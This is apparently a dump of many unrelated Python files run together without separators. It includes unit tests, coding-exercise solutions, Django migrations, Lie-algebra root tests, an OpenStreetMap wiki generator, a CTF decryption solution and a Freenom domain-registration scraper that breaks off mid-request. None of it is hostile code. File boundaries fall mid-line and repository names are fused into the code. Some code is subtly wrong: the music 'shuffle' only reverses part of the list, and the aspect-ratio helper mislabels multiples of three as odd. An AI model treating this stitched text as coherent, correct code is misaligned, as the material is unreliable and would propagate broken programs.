json.loads(line) items.append(line) return items class TestPullRequestGitHub(unittest.TestCase): """ Class to test the PullRequestGitHub class. """ def setUp(self): """ Run before each test to read the test data file """ self.items = read_file('data/test_pulls_data.json') def test__flatten_valid_input(self): """ Test for valid input. A pull request that satisfies all conditions passed while creating a PullRequestGitHub object for testing. A properly flattened pull request is expected. """ pullrequest = PullRequestGitHub(self.items) flat_item = pullrequest._flatten(self.items[0]) flat_expected = [ { 'repo': 'https://github.com/atom/language-java', 'hash': 13262348, 'category': 'pull_request', 'author': 'anson0370', 'created_date': datetime.datetime(2014, 3, 6, 0, 0), 'current_status': "closed", 'merged': True } ] self.assertEqual(flat_item, flat_expected) def test__flatten_invalid_input_since(self): """ Test for invalid input. An empty list is expected to be returned. """ # date in future, hence no pull request will satisfy date check date_since = datetime.datetime.strptime("2020-09-20", "%Y-%m-%d") pullrequest = PullRequestGitHub(self.items, date_range=(date_since, None)) flat_item = pullrequest._flatten(self.items[0]) flat_expected = [] self.assertEqual(flat_item, flat_expected) def test__flatten_invalid_input_until(self): """ Test for invalid input. An empty list is expected to be returned. """ # date in future, hence no pull request will satisfy date check date_until = datetime.datetime.strptime("1800-09-20", "%Y-%m-%d") pullrequest = PullRequestGitHub(self.items, date_range=(None, date_until)) flat_item = pullrequest._flatten(self.items[0]) flat_expected = [] self.assertEqual(flat_item, flat_expected) if __name__ == '__main__': unittest.main(verbosity=2) 0 #--- Exercicio 2 - Variávies e impressão com interpolacão de string #--- Crie um menu para um sistema de cadastro de funcionários #--- O menu deve ser impresso com a função format() para concatenar os números da opções, que devem ser números inteiros #--- Alem das opções o menu deve conter um cabeçalho e um rodapé #--- O cabeçalho e o rodapé devem ser impressos utilizando a multiplicação de caracters #--- Entre o cabeçalho e o menu e entre o menu e o rodapé deverá ter espaçamento de 3 linhas #--- Deve ser utilizado os caracteres especiais de quebra de linha e de tabulaçãotzxyz/leetcode0 from typing import List class Solution: """ 给定一个整数数组,判断是否存在重复元素。 如果任何值在数组中出现至少两次,函数返回 true。如果数组中每个元素都不相同,则返回 false。 示例 1: 输入: [1,2,3,1] 输出: true 示例 2: 输入: [1,2,3,4] 输出: false 示例 3: 输入: [1,1,1,3,3,4,3,2,4,2] 输出: true """ def containsDuplicate(self, nums: List[int]) -> bool: return len(nums) != len(set(nums)) def containsDuplicate2(self, nums: List[int]) -> bool: d = {} for n in nums: if n in d.keys(): return True else: d[n] = True return False if __name__ == '__main__': tests = [ ([1, 2, 3, 1], True), ([1, 2, 3, 4], False), ([1, 1, 1, 3, 3, 4, 3, 2, 4, 2], True) ] for nums, r in tests: assert Solution().containsDuplicate(nums) == r assert Solution().containsDuplicate2(nums) == r rookie/mysite/migrations/0005_testcase_vueusermodel.py1-10 # Generated by Django 2.2.17 on 2021-05-17 16:58 from django.db import migrations, models import django_mysql.models class Migration(migrations.Migration): dependencies = [ ('mysite', '0004_vuemodel'), ] operations = [ migrations.CreateModel( name='TestCase', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('case_name', models.CharField(max_length=50)), ('method', models.CharField(max_length=10)), ('base_url', models.CharField(max_length=500)), ('params', models.CharField(default='', max_length=500, null=True)), ('headers', django_mysql.models.JSONField(default=dict, null=True)), ('mine_type', models.CharField(max_length=5)), ('body', django_mysql.models.JSONField(default=dict, null=True)), ('response', django_mysql.models.JSONField(default=dict, null=True)), ], options={ 'verbose_name': '接口用例表', 'db_table': 'tbl_case_info', }, ), migrations.CreateModel( name='VueUserModel', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('name', models.CharField(max_length=50)), ('email', models.CharField(max_length=50)), ('phonenumber', models.IntegerField()), ('roletype', models.CharField(default='普通用户', max_length=20)), ], options={ 'verbose_name': 'user信息表', 'db_table': 'internal_user', }, ), ] 1-10 # -*- coding: utf-8 -*- # @Author: # @Date: 2016-04-11 22:58:12 # @Last Modified by: # @Last Modified time: 2016-04-11 22:58:18 from datetime import datetime if __name__ == "__main__": T = int(input()) pattern = '%a %d %b %Y %H:%M:%S %z' for _ in range(T): s = datetime.strptime(input(), pattern).timestamp() t = datetime.strptime(input(), pattern).timestamp() print(int(abs(s - t)))samiptimalsena/Guitar-Chord-Recognizer import sounddevice as sd import config import numpy as np from scipy.io.wavfile import write import matplotlib.pyplot as plt import librosa import librosa.display import torch import streamlit as st FRAME_SIZE = 2048 HOP_LENGTH = 512 N_MELS = 128 def record(): duration = 3 fs = 22050 recording = sd.rec(frames=(duration * fs), samplerate=fs, channels=2) sd.wait() write(config.RECORDING_WAV, fs, recording) np.save(config.RECORDING_NPY, recording) print('recording complete') def play(): fs = 22050 recording = np.load(config.RECORDING_NPY) sd.play(recording, fs) def create_tensor(): device = torch.device('cpu') audio, sr = librosa.load(config.RECORDING_WAV, offset=0.3, duration=1.5) melspectogram = librosa.feature.melspectrogram(audio, sr, n_fft=FRAME_SIZE, hop_length=HOP_LENGTH, n_mels=N_MELS) melspectogram = librosa.power_to_db(melspectogram) mel_tensor = torch.from_numpy(melspectogram).type(torch.FloatTensor) mel_tensor = mel_tensor.view(1,1,128,65) mel_tensor = mel_tensor.to(device) return mel_tensor def display_spectogram(): audio, sr = librosa.load(config.RECORDING_WAV, offset=0.3, duration=1.5) melspectogram = librosa.feature.melspectrogram(audio, sr, n_fft=FRAME_SIZE, hop_length=HOP_LENGTH, n_mels=N_MELS) melspectogram = librosa.power_to_db(melspectogram) plt.figure(figsize=(15, 8)) librosa.display.specshow(melspectogram, sr=sr, hop_length=HOP_LENGTH, x_axis='time', y_axis='log') plt.title('Mel-frequency spectrogram') plt.colorbar(format='%+2.0f') st.pyplot(plt)# Copyright 2014 Mirantis, Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import logging from fuel_agent_ci.objects.environment import Environment LOG = logging.getLogger(__name__) class Manager(object): def __init__(self, data): self.env = Environment.new(**data) def do_item(self, item_type, item_action, item_name=None, **kwargs): return getattr( self.env, '%s_%s' % (item_type, item_action))(item_name, **kwargs) def do_env(self, env_action, **kwargs): return getattr(self.env, env_action)(**kwargs) from liesym import F4, E, Basis from sympy import Matrix, Rational, S def test_F4(): F4_ = F4() # test subclass items assert F4_.dimension == 4 assert F4_.n_pos_roots == 24 assert F4_.simple_roots == [ Matrix([[1, -1, 0, 0]]), Matrix([[0, 1, -1, 0]]), Matrix([[0, 0, 1, 0]]), Matrix([[-S.Half, -S.Half, -S.Half, -S.Half]]), ] fw = F4_.fundamental_weights[0] assert fw.basis == Basis.ORTHO assert F4_.to_omega(fw) == Matrix([[1, 0, 0, 0]]) # baseclass generated assert F4_.cartan_matrix == Matrix( [[2, -1, 0, 0], [-1, 2, -2, 0], [0, -1, 2, -1], [0, 0, -1, 2]]) assert F4_.cocartan_matrix == Matrix( [[1, -1, 0, 0], [0, 1, -1, 0], [0, 0, 2, 0], [-1, -1, -1, -1]]) assert F4_.omega_matrix == Matrix( [[1, 0, 0, -1], [1, 1, 0, -2], [S.Half, S.Half, S.Half, -3*S.Half], [0, 0, 0, -1]]) assert F4_.metric_tensor == Matrix( [[2, 3, 2, 1], [3, 6, 4, 2], [2, 4, 3, 3*S.Half], [1, 2, 3*S.Half, 1]]) assert F4_.reflection_matricies == [ Matrix([ [0, 1, 0, 0], [1, 0, 0, 0], [0, 0, 1, 0], [0, 0, 0, 1]]), Matrix([ [1, 0, 0, 0], [0, 0, 1, 0], [0, 1, 0, 0], [0, 0, 0, 1]]), Matrix([ [1, 0, 0, 0], [0, 1, 0, 0], [0, 0, -1, 0], [0, 0, 0, 1]]), Matrix([ [S.Half, -S.Half, -S.Half, -S.Half], [-S.Half, S.Half, -S.Half, -S.Half], [-S.Half, -S.Half, S.Half, -S.Half], [-S.Half, -S.Half, -S.Half, S.Half]])] assert F4_.fundamental_weights == [Matrix([[1, 0, 0, -1]]), Matrix( [[1, 1, 0, -2]]), Matrix([[S.Half, S.Half, S.Half, -3*S.Half]]), Matrix([[0, 0, 0, -1]])] # backend assert [F4_.to_omega(x) for x in F4_.root_system()] == [ Matrix([[1, 0, 0, 0]]), Matrix([[-1, 1, 0, 0]]), Matrix([[0, -1, 2, 0]]), Matrix([[0, 0, 0, 1]]), Matrix([[0, 0, 1, -1]]), Matrix([[0, 1, -2, 2]]), Matrix([[0, 1, -1, 0]]), Matrix([[1, -1, 0, 2]]), Matrix([[-1, 0, 0, 2]]), Matrix([[0, 1, 0, -2]]), Matrix([[1, -1, 1, 0]]), Matrix([[-1, 0, 1, 0]]), Matrix([[1, -1, 2, -2]]), Matrix([[1, 0, -1, 1]]), Matrix([[-1, 0, 2, -2]]), Matrix([[-1, 1, -1, 1]]), Matrix([[1, 0, 0, -1]]), Matrix([[-1, 1, 0, -1]]), Matrix([[0, -1, 1, 1]]), Matrix([[1, 1, -2, 0]]), Matrix([[-1, 2, -2, 0]]), Matrix([[0, -1, 2, -1]]), Matrix([[0, 0, -1, 2]]), Matrix([[2, -1, 0, 0]]), Matrix([[0, 0, 0, 0]]), Matrix([[0, 0, 0, 0]]), Matrix([[0, 0, 0, 0]]), Matrix([[0, 0, 0, 0]]), Matrix([[-2, 1, 0, 0]]), Matrix([[0, 0, 1, -2]]), Matrix([[0, 1, -2, 1]]), Matrix([[1, -2, 2, 0]]), Matrix([[-1, -1, 2, 0]]), Matrix([[0, 1, -1, -1]]), Matrix([[1, -1, 0, 1]]), Matrix([[-1, 0, 0, 1]]), Matrix([[1, -1, 1, -1]]), Matrix([[1, 0, -2, 2]]), Matrix([[-1, 0, 1, -1]]), Matrix([[-1, 1, -2, 2]]), Matrix([[1, 0, -1, 0]]), Matrix([[-1, 1, -1, 0]]), Matrix([[0, -1, 0, 2]]), Matrix([[1, 0, 0, -2]]), Matrix([[-1, 1, 0, -2]]), Matrix([[0, -1, 1, 0]]), Matrix([[0, -1, 2, -2]]), Matrix([[0, 0, -1, 1]]), Matrix([[0, 0, 0, -1]]), Matrix([[0, 1, -2, 0]]), Matrix([[1, -1, 0, 0]]), Matrix([[-1, 0, 0, 0]]), ] def test_E6(): E6 = E(6) # test subclass items assert E6.dimension == 6 assert E6.n_pos_roots == 36 assert E6.simple_roots == [ Matrix([[S.Half, -S.Half, -S.Half, -S.Half, - S.Half, -S.Half, -S.Half, S.Half]]), Matrix([[-1, 1, 0, 0, 0, 0, 0, 0]]), Matrix([[0, -1, 1, 0, 0, 0, 0, 0]]), Matrix([[0, 0, -1, 1, 0, 0, 0, 0]]), Matrix([[0, 0, 0, -1, 1, 0, 0, 0]]), Matrix([[1, 1, 0, 0, 0, 0, 0, 0]]), ] fw = E6.fundamental_weights[0] assert fw.basis == Basis.ORTHO assert E6.to_omega(fw) == Matrix([[1, 0, 0, 0, 0, 0]]) # baseclass generated assert E6.cartan_matrix == Matrix([ [2, -1, 0, 0, 0, 0], [-1, 2, -1, 0, 0, 0], [0, -1, 2, -1, 0, -1], [0, 0, -1, 2, -1, 0], [0, 0, 0, -1, 2, 0], [0, 0, -1, 0, 0, 2]]) assert E6.omega_matrix == Matrix( [[0, 0, 0, 0, 0, Rational(-2, 3), Rational(-2, 3), Rational(2, 3)], [Rational(-1, 2), Rational(1, 2), Rational(1, 2), Rational(1, 2), Rational(1, 2), Rational(-5, 6), Rational(-5, 6), Rational(5, 6)], [0, 0, 1, 1, 1, -1, -1, 1], [0, 0, 0, 1, 1, Rational(-2, 3), Rational(-2, 3), Rational(2, 3)], [0, 0, 0, 0, 1, Rational(-1, 3), Rational(-1, 3), Rational(1, 3)], [Rational(1, 2), Rational(1, 2), Rational(1, 2), Rational(1, 2), Rational(1, 2), Rational(-1, 2), Rational(-1, 2), Rational(1, 2)], ]) assert E6.metric_tensor == Matrix( [[Rational(4, 3), Rational(5, 3), 2, Rational(4, 3), Rational(2, 3), 1], [Rational(5, 3), Rational(10, 3), 4, Rational(8, 3), Rational(4, 3), 2], [2, 4, 6, 4, 2, 3], [Rational(4, 3), Rational(8, 3), 4, Rational(10, 3), Rational(5, 3), 2], [Rational(2, 3), Rational(4, 3), 2, Rational(5, 3), Rational(4, 3), 1], [1, 2, 3, 2, 1, 2], ]) # backend assert [E6.to_omega(x) for x in E6.root_system()] == [ Matrix([[0, 0, 0, 0, 0, 1]]), Matrix([[0, 0, 1, 0, 0, -1]]), Matrix([[0, 1, -1, 1, 0, 0]]), Matrix([[0, 1, 0, -1, 1, 0]]), Matrix([[1, -1, 0, 1, 0, 0]]), Matrix([[-1, 0, 0, 1, 0, 0]]), Matrix([[0, 1, 0, 0, -1, 0]]), Matrix([[1, -1, 1, -1, 1, 0]]), Matrix([[-1, 0, 1, -1, 1, 0]]), Matrix([[1, -1, 1, 0, -1, 0]]), Matrix([[1, 0, -1, 0, 1, 1]]), Matrix([[-1, 0, 1, 0, -1, 0]]), Matrix([[-1, 1, -1, 0, 1, 1]]), Matrix([[1, 0, -1, 1, -1, 1]]), Matrix([[1, 0, 0, 0, 1, -1]]), Matrix([[-1, 1, -1, 1, -1, 1]]), Matrix([[-1, 1, 0, 0, 1, -1]]), Matrix([[0, -1, 0, 0, 1, 1]]), Matrix([[1, 0, 0, -1, 0, 1]]), Matrix([[1, 0, 0, 1, -1, -1]]), Matrix([[-1, 1, 0, -1, 0, 1]]), Matrix([[-1, 1, 0, 1, -1, -1]]), Matrix([[0, -1, 0, 1, -1, 1]]), Matrix([[0, -1, 1, 0, 1, -1]]), Matrix([[1, 0, 1, -1, 0, -1]]), Matrix([[-1, 1, 1, -1, 0, -1]]), Matrix([[0, -1, 1, -1, 0, 1]]), Matrix([[0, -1, 1, 1, -1, -1]]), Matrix([[0, 0, -1, 1, 1, 0]]), Matrix([[1, 1, -1, 0, 0, 0]]), Matrix([[-1, 2, -1, 0, 0, 0]]), Matrix([[0, -1, 2, -1, 0, -1]]), Matrix([[0, 0, -1, 0, 0, 2]]), Matrix([[0, 0, -1, 2, -1, 0]]), Matrix([[0, 0, 0, -1, 2, 0]]), Matrix([[2, -1, 0, 0, 0, 0]]), Matrix([[0, 0, 0, 0, 0, 0]]), Matrix([[0, 0, 0, 0, 0, 0]]), Matrix([[0, 0, 0, 0, 0, 0]]), Matrix([[0, 0, 0, 0, 0, 0]]), Matrix([[0, 0, 0, 0, 0, 0]]), Matrix([[0, 0, 0, 0, 0, 0]]), Matrix([[-2, 1, 0, 0, 0, 0]]), Matrix([[0, 0, 0, 1, -2, 0]]), Matrix([[0, 0, 1, -2, 1, 0]]), Matrix([[0, 0, 1, 0, 0, -2]]), Matrix([[0, 1, -2, 1, 0, 1]]), Matrix([[1, -2, 1, 0, 0, 0]]), Matrix([[-1, -1, 1, 0, 0, 0]]), Matrix([[0, 0, 1, -1, -1, 0]]), Matrix([[0, 1, -1, -1, 1, 1]]), Matrix([[0, 1, -1, 1, 0, -1]]), Matrix([[1, -1, -1, 1, 0, 1]]), Matrix([[-1, 0, -1, 1, 0, 1]]), Matrix([[0, 1, -1, 0, -1, 1]]), Matrix([[0, 1, 0, -1, 1, -1]]), Matrix([[1, -1, 0, -1, 1, 1]]), Matrix([[1, -1, 0, 1, 0, -1]]), Matrix([[-1, 0, 0, -1, 1, 1]]), Matrix([[-1, 0, 0, 1, 0, -1]]), Matrix([[0, 1, 0, 0, -1, -1]]), Matrix([[1, -1, 0, 0, -1, 1]]), Matrix([[1, -1, 1, -1, 1, -1]]), Matrix([[-1, 0, 0, 0, -1, 1]]), Matrix([[-1, 0, 1, -1, 1, -1]]), Matrix([[1, -1, 1, 0, -1, -1]]), Matrix([[1, 0, -1, 0, 1, 0]]), Matrix([[-1, 0, 1, 0, -1, -1]]), Matrix([[-1, 1, -1, 0, 1, 0]]), Matrix([[1, 0, -1, 1, -1, 0]]), Matrix([[-1, 1, -1, 1, -1, 0]]), Matrix([[0, -1, 0, 0, 1, 0]]), Matrix([[1, 0, 0, -1, 0, 0]]), Matrix([[-1, 1, 0, -1, 0, 0]]), Matrix([[0, -1, 0, 1, -1, 0]]), Matrix([[0, -1, 1, -1, 0, 0]]), Matrix([[0, 0, -1, 0, 0, 1]]), Matrix([[0, 0, 0, 0, 0, -1]]), ] assert [E6.to_omega(x) for x in E6.positive_roots] == [ Matrix([[0, 0, 0, 0, 0, 1]]), Matrix([[0, 0, 1, 0, 0, -1]]), Matrix([[0, 1, -1, 1, 0, 0]]), Matrix([[0, 1, 0, -1, 1, 0]]), Matrix([[1, -1, 0, 1, 0, 0]]), Matrix([[-1, 0, 0, 1, 0, 0]]), Matrix([[0, 1, 0, 0, -1, 0]]), Matrix([[1, -1, 1, -1, 1, 0]]), Matrix([[-1, 0, 1, -1, 1, 0]]), Matrix([[1, -1, 1, 0, -1, 0]]), Matrix([[1, 0, -1, 0, 1, 1]]), Matrix([[-1, 0, 1, 0, -1, 0]]), Matrix([[-1, 1, -1, 0, 1, 1]]), Matrix([[1, 0, -1, 1, -1, 1]]), Matrix([[1, 0, 0, 0, 1, -1]]), Matrix([[-1, 1, -1, 1, -1, 1]]), Matrix([[-1, 1, 0, 0, 1, -1]]), Matrix([[0, -1, 0, 0, 1, 1]]), Matrix([[1, 0, 0, -1, 0, 1]]), Matrix([[1, 0, 0, 1, -1, -1]]), Matrix([[-1, 1, 0, -1, 0, 1]]), Matrix([[-1, 1, 0, 1, -1, -1]]), Matrix([[0, -1, 0, 1, -1, 1]]), Matrix([[0, -1, 1, 0, 1, -1]]), Matrix([[1, 0, 1, -1, 0, -1]]), Matrix([[-1, 1, 1, -1, 0, -1]]), Matrix([[0, -1, 1, -1, 0, 1]]), Matrix([[0, -1, 1, 1, -1, -1]]), Matrix([[0, 0, -1, 1, 1, 0]]), Matrix([[1, 1, -1, 0, 0, 0]]), Matrix([[-1, 2, -1, 0, 0, 0]]), Matrix([[0, -1, 2, -1, 0, -1]]), Matrix([[0, 0, -1, 0, 0, 2]]), Matrix([[0, 0, -1, 2, -1, 0]]), Matrix([[0, 0, 0, -1, 2, 0]]), Matrix([[2, -1, 0, 0, 0, 0]]), ] def calculate_aspect_ratio(x_input: object, y_input: object) -> object: lcf = 2 x_odd = y_odd = False if x_input % 3 == 0: x_odd = True if y_input % 3 == 0: y_odd = True if x_odd * y_odd: lcf = 3 num: int num = hcf = 1 while (x_input // (num * lcf)) >= 1: factor = (num * lcf) if x_input % factor == 0 and y_input % factor == 0: hcf = factor num += 1 return x_input // hcf, y_input // hcf 0 # Main Molecular dynamics simulation loop import os import md import ase.io from read_mp_project import read_mp_properties def main(): # read in the .json file as an command line argument? mp_properties = read_mp_properties('test_120_materials.json') # try to create folder 'property_calculations' # if it already exists, continue with the program try: os.mkdir('property_calculations') except: pass # primary loop for MD try: for id, cif in enumerate(mp_properties['cif']): f = open("tmp_cif.cif", "w+") f.write(cif) f.close() atoms = ase.io.read("tmp_cif.cif", None) print("\n \n \nRUNNING MOLECULAR DYNAMICS") try: md.run_md(atoms, str(id)) except Exception as e: print("\n ERROR IN RUNNING MD \n") print("Exception: ", e) os.remove("tmp_cif.cif") except KeyboardInterrupt: pass if __name__ == "__main__": main() subt/ros/base/src/compass.py10-100 import math import pdb import serial import time import os class Compass(): def __init__(self): self.port = serial.Serial("/dev/ttyUSB0",baudrate=19200,timeout=5) self.lastCompass = -1 def update(self): self.port.write(b"\x55\xC1\x02\x02") data1 = self.port.read() data2 = self.port.read() value = ord(data1) * 256 + ord(data2) self.lastCompass = value return value src/ribo_api/router.py0 from django.conf.urls import url, include from rest_framework import routers from ribo_api.views import UserViewSet from ribo_api.views.api.events import EventViewSet from ribo_api.views.api.task import TaskViewSet from ribo_api.views.auth import AuthViewSet router = routers.SimpleRouter(trailing_slash=False) router.register(r'auth', AuthViewSet, base_name='AuthView') router.register(r'user', UserViewSet, base_name='UserView') router.register(r'task', TaskViewSet, base_name='TaskView') router.register(r'event', EventViewSet, base_name='EventView') urlpatterns = [ url(r'^', include(router.urls)), ] Strubbl/map-machine """ Automate OpenStreetMap wiki editing. """ import re from pathlib import Path from typing import Optional from map_machine.doc.collections import Collection from map_machine.map_configuration import MapConfiguration from map_machine.osm.osm_reader import Tags from map_machine.pictogram.icon import Icon, ShapeExtractor from map_machine.scheme import Scheme from map_machine.workspace import Workspace WORKSPACE: Workspace = Workspace(Path("temp")) SCHEME: Scheme = Scheme.from_file(WORKSPACE.DEFAULT_SCHEME_PATH) EXTRACTOR: ShapeExtractor = ShapeExtractor( WORKSPACE.ICONS_PATH, WORKSPACE.ICONS_CONFIG_PATH ) HEADER_PATTERN: re.Pattern = re.compile("==?=?.*==?=?") HEADER_2_PATTERN: re.Pattern = re.compile("== .* ==") HEADER_PATTERNS: list[re.Pattern] = [ re.compile("==\\s*Example.*=="), re.compile("==\\s*See also\\s*=="), ] RENDERING_HEADER_PATTERN: re.Pattern = re.compile("==\\s*Rendering.*==") ROENTGEN_HEADER_PATTERN: re.Pattern = re.compile("===.*Röntgen.*===") class WikiTable: """SVG table with icon combinations.""" def __init__(self, collection: Collection, page_name: str): self.collection: Collection = collection self.page_name: str = page_name def generate_wiki_table(self) -> tuple[str, list[Icon]]: """ Generate Röntgen icon table for the OpenStreetMap wiki page. """ icons: list[Icon] = [] text: str = '{| class="wikitable"\n' if self.collection.column_key is not None: text += f"! {{{{Key|{self.collection.column_key}}}}}" else: text += "! Tag || Icon" if self.collection.row_tags: text += "\n" for current_tags in self.collection.row_tags: text += "|-\n" text += "| " if current_tags: for key, value in current_tags.items(): if value == "*": text += f"{{{{Key|{key}}}}}
    " else: text += f"{{{{Tag|{key}|{value}}}}}
    " text = text[:-6] text += "\n" icon, _ = SCHEME.get_icon( EXTRACTOR, current_tags | self.collection.tags, set(), MapConfiguration(ignore_level_matching=True), ) icons.append(icon.main_icon) text += ( "| " f"[[Image:Röntgen {icon.main_icon.get_name()}.svg|32px]]\n" ) text += "|}\n" return text, icons if not self.collection.column_values: self.collection.column_values = [""] else: make_vertical: bool = False for column_value in self.collection.column_values: if column_value and len(column_value) > 2: make_vertical = True for column_value in self.collection.column_values: text += " ||" if column_value: tag: str = ( f"{{{{TagValue|" f"{self.collection.column_key}|{column_value}}}}}" ) text += " " + ( f"{{{{vert header|{tag}}}}}" if make_vertical else tag ) text += "\n" for row_value in self.collection.row_values: text += "|-\n" if row_value: text += f"| {{{{Tag|{self.collection.row_key}|{row_value}}}}}\n" else: text += "|\n" for column_value in self.collection.column_values: current_tags: Tags = dict(self.collection.tags) | { self.collection.row_key: row_value } if column_value: current_tags |= {self.collection.column_key: column_value} icon, _ = SCHEME.get_icon(EXTRACTOR, current_tags, set()) if not icon: print("Icon was not constructed.") text += ( "| " f"[[Image:Röntgen {icon.main_icon.get_name()}.svg|32px]]\n" ) icons.append(icon.main_icon) text += "|}\n" return text, icons def generate_new_text( old_text: str, table: WikiTable, ) -> tuple[Optional[str], list[Icon]]: """ Generate Röntgen icon table for the OpenStreetMap wiki page. :param old_text: previous wiki page text :param table: wiki table generator :return: new wiki page text """ wiki_text: str icons = [] if table.collection.row_key or table.collection.row_tags: wiki_text, icons = table.generate_wiki_table() else: processed = set() icon, _ = SCHEME.get_icon( EXTRACTOR, table.collection.tags, processed, MapConfiguration() ) if not icon.main_icon.is_default(): wiki_text = ( f"[[Image:Röntgen {icon.main_icon.get_name()}.svg|32px]]\n" ) icons.append(icon.main_icon) elif icon.extra_icons: wiki_text = ( f"Röntgen icon set has additional icon for the tag: " f"[[Image:Röntgen {icon.extra_icons[0].get_name()}.svg|32px]]." f"\n" ) icons.append(icon.extra_icons[0]) else: wiki_text = "" lines: list[str] = old_text.split("\n") # If rendering section already exists. start: Optional[int] = None end: int = -1 for index, line in enumerate(lines): if HEADER_2_PATTERN.match(line): if start is not None: end = index break if RENDERING_HEADER_PATTERN.match(line): start = index if start is not None: return ( "\n".join(lines[: start + 2]) + "\n=== [[Röntgen]] icons in [[Map Machine]] ===\n" + f"\n{wiki_text}\n" + "\n".join(lines[end:]) ), icons # If Röntgen rendering section already exists. start: Optional[int] = None end: int = -1 for index, line in enumerate(lines): if HEADER_PATTERN.match(line): if start is not None: end = index break if ROENTGEN_HEADER_PATTERN.match(line): start = index if start is not None: return ( "\n".join(lines[: start + 2]) + f"\n{wiki_text}\n" + "\n".join(lines[end:]) ), icons # Otherwise. headers: list[Optional[int]] = [None, None] for index, line in enumerate(lines): for i, pattern in enumerate(HEADER_PATTERNS): if pattern.match(line): headers[i] = index filtered = list(filter(lambda x: x is not None, headers)) header: int if filtered: header = filtered[0] else: lines += [""] header = len(lines) return ( "\n".join(lines[:header]) + "\n== Rendering ==\n\n=== [[Röntgen]] icons in [[Map Machine]] " "===\n\n" + wiki_text + "\n" + "\n".join(lines[header:]) ), icons 2020_2021/Training_2/Chain/solution/chain_encryption.py0 def encrypt(text, iv): result = b"" current_key = iv for char in text: result += bytes([(char + current_key) % 256]) current_key = (char + current_key) % 256 return result def decrypt(text, iv): result = b"" last_key = iv current_key = iv for char in text: t = (char - current_key) % 256 result += bytes([t]) current_key = (current_key + t) % 256 return result if __name__ == "__main__": iv = int(input("Enter initial chain value >> ")) % 256 encrypted = open("encrypted.txt", 'rb').read() decrypted = decrypt(encrypted, iv) print(decrypted)""" design a system to shuffle music, given a list, shuffle songs and return in a new list ["I love you","Bieber", "Little girl"] How random can it be? """ import random def swap_order(songs,left,right): while left < right: temp = songs[left] songs[left] = songs[right] songs[right] = temp left += 1 right -= 1 return songs def swap_with_center(songs, center): mid = int(len(songs) / 2) # if center < mid, swap only between 0..mid if center < mid: return swap_order(songs,0,center) # if center == mid, swap between 0..len(songs) if center == mid: return swap_order(songs,0,len(songs)-1) # if center > mid, swap only between mid..len(songs) if center > mid: return swap_order(songs,mid,len(songs)-1) def shuffle_music(songs): # get the random index from [0, len(songs)) rand = random.randrange(0,len(songs)) # set this index as a pivot which will swap all the right and left elements print(rand) return swap_with_center(songs, rand) songs = ["I love you","Bieber", "mucho", "Hello","starboy","Little girl"] print(shuffle_music(songs)) app/__init__.py from sanic import Sanic from sanic_cors import CORS from app.cpu.controllers import cpu_module from app.disk.controllers import disk_module from app.main.controllers import main_module from app.network.controllers import network_module from app.os.controllers import os_module from app.ram.controllers import ram_module app = Sanic() CORS(app) app.config.from_object('config') # Register blueprints app.register_blueprint(cpu_module) app.register_blueprint(disk_module) app.register_blueprint(main_module) app.register_blueprint(network_module) app.register_blueprint(os_module) app.register_blueprint(ram_module) maartenelgar/Block_Fund_Trading__init__.pypirc.py [distutils] index-servers = pypi [pypi] username: password: #! /usr/bin/env python3 from pathlib import Path import torch from torch import nn import blobconverter class CatImgs(nn.Module): def forward(self, img1, img2, img3): return torch.cat((img1, img2, img3), 3) # Define the expected input shape (dummy input) shape = (1, 3, 300, 300) X = torch.ones(shape, dtype=torch.float32) path = Path("out/") path.mkdir(parents=True, exist_ok=True) onnx_file = "out/concat.onnx" print(f"Writing to {onnx_file}") torch.onnx.export( CatImgs(), (X, X, X), onnx_file, opset_version=12, do_constant_folding=True, input_names = ['img1', 'img2', 'img3'], # Optional output_names = ['output'], # Optional ) # No need for onnx-simplifier here # Use blobconverter to convert onnx->IR->blob blobconverter.from_onnx( model=onnx_file, data_type="FP16", shaves=6, use_cache=False, output_dir="../models", optimizer_params=[] )ducu/rqrq/suspension.py WORKERS_SUSPENDED = 'rq:suspended' def is_suspended(connection): return connection.exists(WORKERS_SUSPENDED) def suspend(connection, ttl=None): """ttl = time to live in seconds. Default is no expiration Note: If you pass in 0 it will invalidate right away """ connection.set(WORKERS_SUSPENDED, 1) if ttl is not None: connection.expire(WORKERS_SUSPENDED, ttl) def resume(connection): return connection.delete(WORKERS_SUSPENDED)reteps/freenom-register #!/usr/bin/env python3 import requests, sys from bs4 import BeautifulSoup class FreenomError(Exception): pass class Freenom(object): def __init__(self): self.session = requests.Session() def login(self, email, password): url = "https://my.freenom.com/dologin.php" payload = {'token': self.get_token('https://my.freenom.com/clientarea.php'), 'username': email, 'password': password} r = self.session.post(url, payload, headers={'Host': 'my.freenom.com', 'Referer': 'https://my.freenom.com/clientarea.php'}) if r.status_code != 200: raise FreenomError(f"Could not reach {url}") elif 'Hello' not in r.text: raise FreenomError("Email or password is incorrect.") def is_available(self, domain): payload = { 'domain':domain.split(".")[0], 'tld':domain.split(".")[1] } r = self.session.post("https://my.freenom.com/includes/domains/fn-available.php", payload, headers={'Host': 'my.freenom.com', 'Referer': 'https://my.freenom.com/domains.php'}).json()['top_domain'] return r["status"] == "AVAILABLE" and r["type"] == "FREE" def get_token(self, url): return self.session.get(url).text.split('name="token" value="',2)[1].split('"',1)[0] def register_domain(self, domain): self.domain = domain self.add_to_cart() self.checkout() def add_to_cart(self): url = "https://my.freenom.com/includes/domains/confdomain-update.php" if not self.is_available(self.domain): raise FreenomError("Domain is not available.") payload = { 'domain': self.domain, 'period': '12M' } r = self.session.post(url, payload, headers={'Host': 'my.freenom.com', 'Referer': 'https://my.freenom.com/cart.php?a=confdomains'}).json() if r["status"] != "OK": raise FreenomError("Something went wrong.") def checkout(self): token = self.get_token("https://my.freenom.com/cart.php?a=confdomains") periodName = self.domain.split(".")[0] + "_" + self.domain.split(".")[1] + "_period" payload = { "token": token, "update": "true", periodName: "12M", "idprotection[0]":"on", "domainns1":"ns01.freenom.com", "domainns2":"ns02.freenom.com", "domainns3":"ns03.freenom.com", "domainns4":"ns04.freenom.com", "domainns5":"" } r = self.session.post("https://my.freenom.com/cart.php?a=confdomains", payload, headers={'Host': 'my.freenom.com', 'Referer': 